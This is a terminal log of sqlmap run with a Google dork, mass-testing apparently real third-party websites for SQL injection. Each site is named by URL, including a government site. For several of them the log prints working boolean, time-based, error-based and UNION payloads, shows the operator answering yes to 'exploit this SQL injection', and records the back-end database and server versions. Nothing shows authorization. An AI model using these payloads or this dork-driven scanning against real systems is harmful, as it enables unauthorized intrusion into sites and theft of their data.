ec2-user@kali:~$ sqlmap -g "inurl:\".php?id=1\""
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.11#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

URL 1:
GET http://www.dipintoguitars.com/category.php?id=1
403 (Forbidden) - 156 times
URL 2:
GET http://www.bible-history.com/subcat.php?id=1
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 57 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 3193=3193

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x71627a7871,0x49477062504470636447777741647962736f47614c694c755145747a5478556a5a707353716b5978,0x716a627171),NULL,NULL,NULL-- PjWh
---
do you want to exploit this SQL injection? [Y/n] Y
[12:09:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.0.25, Apache 2.4.27
back-end DBMS: MySQL >= 5.0.12
URL 3:
GET http://www.romanianwriters.ro/s.php?id=1
do you want to test this URL? [Y/n/q]
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 2815=2815 AND 'Dsci'='Dsci

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71786b7171,(SELECT (ELT(7770=7770,1))),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'nQDW'='nQDW

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'IIbG'='IIbG

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-7196' UNION ALL SELECT NULL,NULL,CONCAT(0x71786b7171,0x71736c61674b57466c7161524245757a46595a45504c524b484a4752586c4a6f714c42675371646d,0x7178717a71)-- Zjyy
---
do you want to exploit this SQL injection? [Y/n] Y
[12:11:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
URL 4:
GET http://berkeleyrecycling.org/page.php?id=1
do you want to test this URL? [Y/n/q]
URL 5:
GET http://www.xrayrisk.com/calculator/calculator-normal-studies.php?id=1
do you want to test this URL? [Y/n/q]
NO
URL 6:
GET http://www.atrium.com.pk/Shopping.php?ID=1
do you want to test this URL? [Y/n/q]
GET parameter 'ID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y
sqlmap identified the following injection point(s) with a total of 78 HTTP(s) requests:
---
Parameter: ID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=1' AND 7881=7881 AND 'sQCD'='sQCD

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: ID=1' AND (SELECT 7045 FROM(SELECT COUNT(*),CONCAT(0x7170716271,(SELECT (ELT(7045=7045,1))),0x716b7a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wdfL'='wdfL

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: ID=-9341' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170716271,0x765466794f47736555676e456e6b76765345774145546d716e5a6b497066684c746772545458734f,0x716b7a7a71),NULL,NULL,NULL,NULL-- ArQK
---
do you want to exploit this SQL injection? [Y/n] Y
web application technology: PHP 5.6.30, Apache 2.4.25
back-end DBMS: MySQL >= 5.0
406 (Not Acceptable) - 1 times
URL 7:
GET http://www.bpc.gov.bd/contactus.php?id=1
do you want to test this URL? [Y/n/q]
403 (Forbidden) - 35 times, 406 (Not Acceptable) - 122 times
URL 8:
GET http://www.teamgear.us/store.php?id=1
do you want to test this URL? [Y/n/q]
> y
NO
URL 9:
GET http://www.jbctools.com/cataleg.php?id=1
do you want to test this URL? [Y/n/q]
NO



